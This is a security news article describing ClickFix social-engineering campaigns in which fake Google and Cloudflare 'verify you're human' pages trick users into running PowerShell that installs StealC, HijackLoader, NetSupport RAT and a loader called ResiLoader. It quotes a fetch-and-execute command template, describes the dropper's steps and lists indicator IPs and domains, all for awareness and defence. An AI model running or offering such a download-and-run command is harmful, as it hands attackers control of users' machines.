HomeCyber BalkansFake Google and Cloudflare Verification Pages Distributing StealC, HijackLoader, and NetSupport Malware

Fake Google and Cloudflare Verification Pages Distributing StealC, HijackLoader, and NetSupport Malware

Published on

spot_img

Increased Exploitation of ClickFix Social Engineering Campaigns: A Rising Threat

Threat actors are currently leveraging advanced ClickFix social engineering campaigns that closely imitate the verification processes used by Google and Cloudflare. This alarming trend primarily serves to disseminate various high-impact malware families, notably StealC, HijackLoader, and NetSupport RAT, alongside newly identified loaders. Such tactics exemplify the increasing sophistication of cybercriminal strategies aimed at compromising user security.

Recent threat intelligence research reveals that these malicious campaigns have been operational since late 2025. They have been particularly successful in deceiving users into executing malicious PowerShell commands manually. This method effectively circumvents traditional security measures, leading to a complete compromise of the targeted systems. The artifice employed wherein users are prompted to run these commands raises significant concerns regarding user awareness and the persistent efficacy of social engineering tactics.

The attack chains predominantly rely on counterfeit “Verify you’re human” or “Manual Verification Required” pages, which mimic legitimate Google reCAPTCHA prompts, Google Meet verifications, and Cloudflare security checks. These pages are cunningly hosted on repurposed domains, compromised websites, and the Cloudflare Pages (.pages.dev) infrastructure. Victims, believing they are on a secure site, are instructed to execute commands, which can include the following example:

powershell -c "iex(irm '{IP}:{Port}/{Path}')"

The ports associated with these commands—6600, 9900, 5506, 7895, 7493, 149, and 8442—further facilitate the illicit sharing of malware. Some campaigns even employ the IClickFix framework to dynamically inject payloads through clipboard actions, demonstrating the extensive adaptability of the techniques in use.

The infection process typically initiates with either obfuscated or plaintext PowerShell commands incorporated within HTML templates, such as CustomCaptcha or the aptly named “SECURITY GATEWAY” framework. This framework comprises components such as GatewayRuntime, RemoteVault, and BeaconDispatcher. In certain instances, attackers have devised an “approval gate” that permits real-time selection of payloads, thus enhancing the likelihood of user interaction.

These campaigns utilize a variety of lures, including counterfeit Google login warnings, QR code generators, and Google Meet prompts that claim to “fix audio drivers.” Endpoint responses like /api/driver-clipboard.php specifically return Operating System-targeted payloads, as has been documented by cybersecurity experts at Malwarebytes.

Once a victim executes the PowerShell downloader, it drops a script named tmpXXXX.tmp.ps1 into the Temp directory. This script, working clandestinely, creates a directory located at C:\ProgramData\Zooms, subsequently downloading second-stage payloads from Cloudflare R2 buckets or other compromised IPs. In some instances, it even exfiltrates sensitive host data to malicious endpoints.

The malware delivery mechanism is notably modular, employing a variety of formats—including MSI installers, ZIP archives, and executable loaders—to spread malware effectively. Payload mappings have been observed to include trojanized versions of applications and various stealer types, reflecting the multilayered nature of malware distribution.

A particularly notable infection chain involves a trojanized Franz application, which downloads an undocumented loader known as ResiLoader. This loader, designed as an obfuscated .NET NativeAOT DLL, exploits “bring your own device” (BYOD) techniques with a driver that disables over 140 anti-virus and endpoint detection and response (EDR) processes. The ResiLoader establishes persistence through registry keys and cleverly implements User Account Control (UAC) bypasses.

In their operations, attackers have been adept at hiding their activities through an extensive network of domains and infrastructure. These include a diverse range of domains like onegeekworld.com, antibotv3.com, and various Cloudflare R2 storage buckets. Known malicious IP addresses linked to payload distribution and command-and-control functionality further complicate tracking efforts.

As this campaign underscores the rising effectiveness of user-assisted execution techniques, the reliance on social engineering methodologies allows threat actors to significantly reduce detection rates. By leveraging trusted brands and compelling users to manually engage with malicious processes, attackers maintain flexible and multi-layered payload distribution capabilities.

In conclusion, the unfolding trends in cyber threats reveal an urgent need for enhanced user education and robust security measures. Recognizing the telltale signs of social engineering and fostering a culture of skepticism about unsolicited prompts can significantly mitigate risks associated with these sophisticated methods of digital deception.

Indicators of Compromise

  • Malware: ResiLoader DLL, a new loader used for evading detection.
  • Payload Delivery IPs: 151.240.151.126, 85.239.149.16, and others associated with ClickFix infrastructure.
  • Infrastructure Domains: Various legitimate-hosting domains taken over for malicious purposes, highlighting the necessity for vigilant monitoring.

The evolving landscape of cybersecurity threats emphasizes the paramount importance of remaining attentive and aware of new tactics employed by cybercriminals. By staying informed, individuals and organizations can better defend against these pervasive threats.

Source link

Latest articles

New Avalon Malware Framework Enhances CrownX Ransomware Features

Cybersecurity researchers have uncovered a previously unknown modular malware framework known as Avalon, which...

NCSC Shares Penetration Testing Defense Tips

On July 1, the United Kingdom's National Cyber Security Centre (NCSC) released guidance designed...

How Okta and CrowdStrike Collaborate to Enhance Protection Against Cross-Domain Attacks Webinar

Navigating the New Age of Cybersecurity: The AI Inflection Point As artificial intelligence (AI) becomes...

Alibaba Reportedly Prohibits Claude Code Due to Alleged Backdoor Risks in AI Coding Tool

Alibaba is reportedly set to implement a ban on the use of Anthropic’s Claude...

More like this

New Avalon Malware Framework Enhances CrownX Ransomware Features

Cybersecurity researchers have uncovered a previously unknown modular malware framework known as Avalon, which...

NCSC Shares Penetration Testing Defense Tips

On July 1, the United Kingdom's National Cyber Security Centre (NCSC) released guidance designed...

How Okta and CrowdStrike Collaborate to Enhance Protection Against Cross-Domain Attacks Webinar

Navigating the New Age of Cybersecurity: The AI Inflection Point As artificial intelligence (AI) becomes...